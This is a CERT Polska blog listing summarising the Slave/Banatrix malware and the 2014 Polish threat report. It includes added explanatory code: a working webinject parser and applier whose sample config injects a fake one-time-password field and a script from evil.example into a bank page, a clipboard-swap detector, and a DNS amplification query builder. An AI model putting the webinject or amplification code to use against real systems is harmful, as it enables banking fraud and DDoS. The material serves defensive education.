Slave, Banatrix and ransomware

3 July 2015 Łukasz Siewierski

In March 2015, S21sec published their analysis of a new e-banking trojan targeting Polish users. They named it “Slave”, because that string was part of the path to one of its shared libraries. We think (in part thanks to the kernelmode.info thread) that Slave was made by the same group of authors responsible for the previously described Banatrix and for a ransomware/Android malware campaign. This means that those authors are most certainly fluent in Polish.

Sorry, but this post is not available in English

17 June 2015 Łukasz Siewierski


Threats in Polish networks – CERT Polska 2014 report (English version)

25 May 2015 piotrk

Today we published the English version of the annual CERT Polska report. It presents the most important trends and observations that, in our view, shaped Polish cybersecurity in 2014: new and emerging threats, their evolution, and our responses to them.

In 2014 CERT Polska continued its efforts to improve the security of Internet users in Poland and worldwide. Last year our work focused on botnet mitigation, especially where the botnets used .pl domains for command and control. Our actions led cybercriminals to limit their use of the .pl TLD, and we observed misuse of .pl domains much less often. There are, however, cases in which Domain Name Tasting (short-lived domain registration) is used to deploy exploit kits.

The most serious threat to users of Polish cyberspace was (and still is) banking trojans. In 2014 we observed the rise of the Tinba, VMZeuS, Kronos and ISFB families. All of them use so-called “webinjects”: small snippets of (usually JavaScript) code that are injected into the online banking website to perform specific tasks, such as using social engineering to steal one-time passwords. Webinjects also played another role: they were served when a home router had been compromised and its DNS servers changed. Because of this change, an affected user connected to the online banking site through the cybercriminals’ proxy, which in turn injected JavaScript code into the website.
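To make the webinject mechanism concrete, the following is an added example (written for this page, not code from the report or from any of the malware families named above) that parses a ZeuS-style webinject configuration and applies it to a page the way the trojan, or the proxy behind a DNS-changed router, would. The config, the bank page and every URL and hostname in it are constructed for the example; the `set_url` / `data_before` / `data_inject` / `data_after` / `data_end` syntax is the widely copied ZeuS format.

```python
"""Parsing and applying a ZeuS-style webinject config (added example, not from the report).

A webinject rule names a URL mask and a snippet to insert into the bank's
page between two anchor strings.  The syntax here (set_url, then
data_before / data_inject / data_after blocks, each closed by data_end) is
the widely copied ZeuS format; the flag letters after the URL (G = GET,
P = POST) are stored but not interpreted.  The config, the page and the
URLs below are constructed for this example; nothing touches a network.
"""
import fnmatch
from dataclasses import dataclass


@dataclass
class InjectRule:
    url_mask: str          # shell-style wildcard, e.g. https://bank.example/login*
    flags: str = ""        # e.g. "GP"; stored only
    before: str = ""       # the snippet goes right after this anchor ...
    inject: str = ""       # ... this is the snippet ...
    after: str = ""        # ... and this anchor must follow it


def parse_webinjects(text):
    """Turn the textual config into InjectRule objects."""
    rules, current, block, buf = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if block is not None and stripped != "data_end":
            buf.append(line)                      # inside a data_* block: keep verbatim
        elif stripped.startswith("set_url"):
            parts = stripped.split()
            current = InjectRule(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else "")
            rules.append(current)
        elif stripped in ("data_before", "data_inject", "data_after"):
            if current is None:
                raise ValueError(f"{stripped} before any set_url")
            block, buf = stripped[len("data_"):], []
        elif stripped == "data_end":
            if block is None:
                raise ValueError("data_end without an open block")
            setattr(current, block, "\n".join(buf))
            block = None
    return rules


def apply_injects(url, html, rules):
    """What the trojan (or the DNS-changer proxy) does to a matching page.
    Returns (modified html, number of rules applied)."""
    applied = 0
    for rule in rules:
        if not fnmatch.fnmatchcase(url, rule.url_mask) or not rule.inject:
            continue
        if rule.before:
            start = html.find(rule.before)
            if start < 0:
                continue
            pos = start + len(rule.before)
            if rule.after and html.find(rule.after, pos) < 0:
                continue                          # anchors must appear in order
        elif rule.after:
            pos = html.find(rule.after)
            if pos < 0:
                continue
        else:
            continue                              # no anchor at all: nowhere to inject
        html = html[:pos] + "\n" + rule.inject + "\n" + html[pos:]
        applied += 1
    return html, applied


# Constructed config: rule 1 adds a fake one-time-password field to the login
# form (the social-engineering case); rule 2 loads a remote script on transfers.
SAMPLE_CONFIG = """
set_url https://bank.example/login* GP
data_before
<input type="password" name="pass">
data_end
data_inject
<p class="otp">For your security, confirm your one-time code:</p>
<input type="text" name="otp">
data_end
data_after
</form>
data_end

set_url https://bank.example/transfer* GP
data_before
data_end
data_inject
<script src="https://evil.example/inject.js"></script>
data_end
data_after
</body>
data_end
"""

# Constructed stand-in for the bank's login page.
SAMPLE_PAGE = """<html><body>
<form id="login" action="/login">
<input type="text" name="user">
<input type="password" name="pass">
<button>Log in</button>
</form>
</body></html>"""


def run_demo():
    """Apply the constructed rules to the constructed login page."""
    return apply_injects("https://bank.example/login?lang=pl", SAMPLE_PAGE,
                         parse_webinjects(SAMPLE_CONFIG))


if __name__ == "__main__":
    html, count = run_demo()
    print(f"{count} rule(s) applied:\n{html}")
```

The anchors are plain substring matches, which is why injects are fragile whenever the bank changes its markup; from the defender's side, the same property means a diff of the served page against what the browser actually rendered reveals the injected fragment.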

Last year we also observed an increase in APT attacks, some of which targeted Poland: examples include APT28, Dragonfly and BlackEnergy 2. These operations, however, were much broader than Poland, which was one of many targets rather than the primary one.

An interesting new category of malware made its debut: malware that changes the bank account number either in the Windows clipboard (VBKlip) or in the browser’s memory (Banatrix). There is some evidence that the authors of this malware write fluent Polish, so we decided to analyze it further.
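The clipboard variant is worth a closer look, because the substituted number is itself a syntactically valid account number, so no format or checksum check on the pasted value will catch it. The following added example (written for this page, not code from the report or from any analysis of VBKlip) validates Polish account numbers with the ISO 13616 mod-97 check and then shows the only check that does work: remembering what the user copied and comparing it with what is about to be pasted. The two account numbers and the clipboard event sequence are constructed for the example.

```python
"""Detecting a clipboard account-number swap (added example, not from the report).

VBKlip-style malware watches the clipboard for a bank account number and
replaces it with the attacker's.  The substitute is a *valid* account
number, so format or checksum validation alone never catches it; what does
is remembering what the user copied and comparing it with what gets pasted.
Every account number and clipboard event below is constructed.
"""
import re

_PL_AS_DIGITS = "2521"   # letters 'P' and 'L' as IBAN digit values (A=10 ... P=25, L=21)


def normalise(text):
    """Drop spaces, dashes and an optional 'PL' prefix so formatting variants compare equal."""
    text = re.sub(r"[\s-]", "", text).upper()
    return text[2:] if text.startswith("PL") else text


def is_nrb(text):
    """True if the text looks like a 26-digit Polish domestic account number (NRB)."""
    return re.fullmatch(r"\d{26}", normalise(text)) is not None


def nrb_check_digits(bban):
    """ISO 13616 mod-97 check digits for a 24-digit Polish BBAN."""
    if not re.fullmatch(r"\d{24}", bban):
        raise ValueError("BBAN must be 24 digits")
    remainder = int(bban + _PL_AS_DIGITS + "00") % 97
    return f"{98 - remainder:02d}"


def is_valid_nrb(text):
    """Checksum validation: 'PL' + NRB, rearranged per ISO 13616, must be 1 mod 97."""
    nrb = normalise(text)
    if not re.fullmatch(r"\d{26}", nrb):
        return False
    return int(nrb[2:] + _PL_AS_DIGITS + nrb[:2]) % 97 == 1


class ClipboardGuard:
    """Remembers the last account number the *user* copied and flags a paste that differs.

    Events are (kind, text) tuples: 'copy' = user Ctrl-C, 'set' = any other
    write to the clipboard (what malware does), 'paste' = user Ctrl-V.
    """

    def __init__(self):
        self.last_user_copy = None
        self.alerts = []

    def feed(self, events):
        for kind, text in events:
            if kind == "copy":
                # Only a genuine user copy is trusted; anything else resets the baseline.
                self.last_user_copy = normalise(text) if is_nrb(text) else None
            elif kind == "paste" and is_nrb(text):
                pasted = normalise(text)
                if self.last_user_copy is not None and pasted != self.last_user_copy:
                    self.alerts.append((self.last_user_copy, pasted))
            # 'set' events are deliberately ignored: they never update the baseline.
        return self.alerts


# Constructed data: the payee the user meant to pay and the attacker's substitute.
VICTIM_PAYEE = "25 1010 0000 0000 0000 0000 0000"
ATTACKER_ACCOUNT = "69114000000000000000000000"

SAMPLE_EVENTS = [
    ("copy", VICTIM_PAYEE),        # user copies the payee's number from an invoice
    ("set", ATTACKER_ACCOUNT),     # malware silently rewrites the clipboard
    ("paste", ATTACKER_ACCOUNT),   # user pastes into the transfer form
]


def run_demo():
    """Feed the constructed event sequence through the guard; returns the alerts."""
    return ClipboardGuard().feed(SAMPLE_EVENTS)


if __name__ == "__main__":
    print("substitute passes the checksum:", is_valid_nrb(ATTACKER_ACCOUNT))
    for copied, pasted in run_demo():
        print(f"ALERT: copied {copied} but pasting {pasted}")
```

Both constructed numbers pass the mod-97 check, which is exactly why the swap is effective; the guard never looks at validity, only at whether the pasted value is the one the user put there.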

Security vulnerabilities in basic network protocols, their implementations and other popular tools formed another part of the 2014 cybersecurity landscape. Cybercriminals continue to abuse misconfigured network services such as DNS and NTP as amplifiers for DDoS attacks. Data from our n6 platform gives a good estimate of the rate at which Polish network operators fix these vulnerabilities and misconfigurations.
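The reason a misconfigured resolver matters is arithmetic: a small query with a spoofed source address elicits a much larger answer. The following added example (written for this page, not code from the report or from the n6 platform) builds a real DNS ANY query with EDNS0 using only the standard library, parses an answer, and reports the bandwidth amplification factor. The response packet is constructed here to stand in for what an open resolver would return; it does not come from any real server.

```python
"""Amplification arithmetic for a DNS reflector (added example, not from the report).

Builds a real DNS query (ANY, with an EDNS0 OPT record), parses a response
and reports response bytes / query bytes.  The response is constructed for
the example; nothing here touches the network.
"""
import struct

QTYPE_ANY, QTYPE_OPT, QCLASS_IN = 255, 41, 1


def encode_name(name):
    """'example.com' -> b'\\x07example\\x03com\\x00' (wire-format labels)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def build_query(name, qtype=QTYPE_ANY, txid=0x1234, udp_payload=4096):
    """Recursive query plus an EDNS0 OPT record advertising a large UDP buffer.
    Without EDNS0 the answer is truncated at 512 bytes, which caps amplification."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)  # RD set; 1 question, 1 additional
    question = encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)
    opt = b"\x00" + struct.pack("!HHIH", QTYPE_OPT, udp_payload, 0, 0)  # root name; class = payload size
    return header + question + opt


def skip_name(buf, off):
    """Advance past a wire-format name, handling compression pointers (0xC0xx)."""
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1
        if length == 0:
            return off
        off += length


def parse_response(buf):
    """Return header fields and (type, rdlength) for every resource record."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(buf, off) + 4            # QTYPE + QCLASS
    records = []
    for _ in range(an + ns + ar):
        off = skip_name(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10 + rdlen
        records.append((rtype, rdlen))
    if off != len(buf):
        raise ValueError("malformed response: trailing bytes")
    return {"txid": txid, "flags": flags, "records": records}


def amplification_factor(query, response):
    """Bandwidth amplification factor = response bytes / query bytes."""
    return round(len(response) / len(query), 1)


def build_response(name, txid, answers):
    """Constructed responder side: answer section only, each owner name
    compressed to a pointer at the question name (offset 12 -> 0xC00C)."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0)  # QR, RD, RA
    question = encode_name(name) + struct.pack("!HH", QTYPE_ANY, QCLASS_IN)
    rrs = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", rtype, QCLASS_IN, 3600, len(rdata)) + rdata
                   for rtype, rdata in answers)
    return header + question + rrs


# Constructed sample: an ANY answer padded with large DNSSEC-shaped records,
# the kind of zone that makes a resolver a good amplifier.
SAMPLE_NAME, SAMPLE_TXID = "example.com", 0x1234
SAMPLE_ANSWERS = [
    (1, bytes([192, 0, 2, 1])),                  # A 192.0.2.1 (TEST-NET-1 documentation address)
    (16, bytes([255]) + b"x" * 255),             # TXT, one 255-byte string (constructed filler)
    (48, bytes([1, 1, 3, 8]) + b"\x00" * 257),   # DNSKEY-shaped blob (constructed)
    (46, b"\x00" * 150),                         # RRSIG-shaped blob (constructed)
]


def run_demo():
    """Returns (query bytes, response bytes, record count, amplification factor)."""
    query = build_query(SAMPLE_NAME, txid=SAMPLE_TXID)
    response = build_response(SAMPLE_NAME, SAMPLE_TXID, SAMPLE_ANSWERS)
    parsed = parse_response(response)
    return len(query), len(response), len(parsed["records"]), amplification_factor(query, response)


if __name__ == "__main__":
    qlen, rlen, nrr, factor = run_demo()
    print(f"query {qlen} B -> response {rlen} B ({nrr} RRs): amplification x{factor}")
```

The 40-byte query is what an attacker sends with the victim's address as source; the resolver pays the 748-byte answer to the victim. To check your own resolver, send `build_query(...)` over UDP to port 53 from an address outside your network: an answer (rather than REFUSED or silence) means it is open to the Internet.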

The statistical analyses presented in this report are largely based on data from the n6 platform, which aggregates over 50 sources of information from more than 30 companies and groups around the world. Combined with our own sources, this data lets us present a unique analysis of the state of security of Polish networks in 2014.

You can download the full English language report here.

The original Polish report, published on April 21st, is available here.

Malware attack on both Windows and Android

22 May 2015 Łukasz Siewierski

SECURE 2015 – Call for Speakers

8 May 2015 przemek

DGA botnet domains: malicious usage of pseudo random domains

6 May 2015 piotrb

Polish Team Wins 3rd Place in NATO Locked Shields Exercise

28 April 2015 alex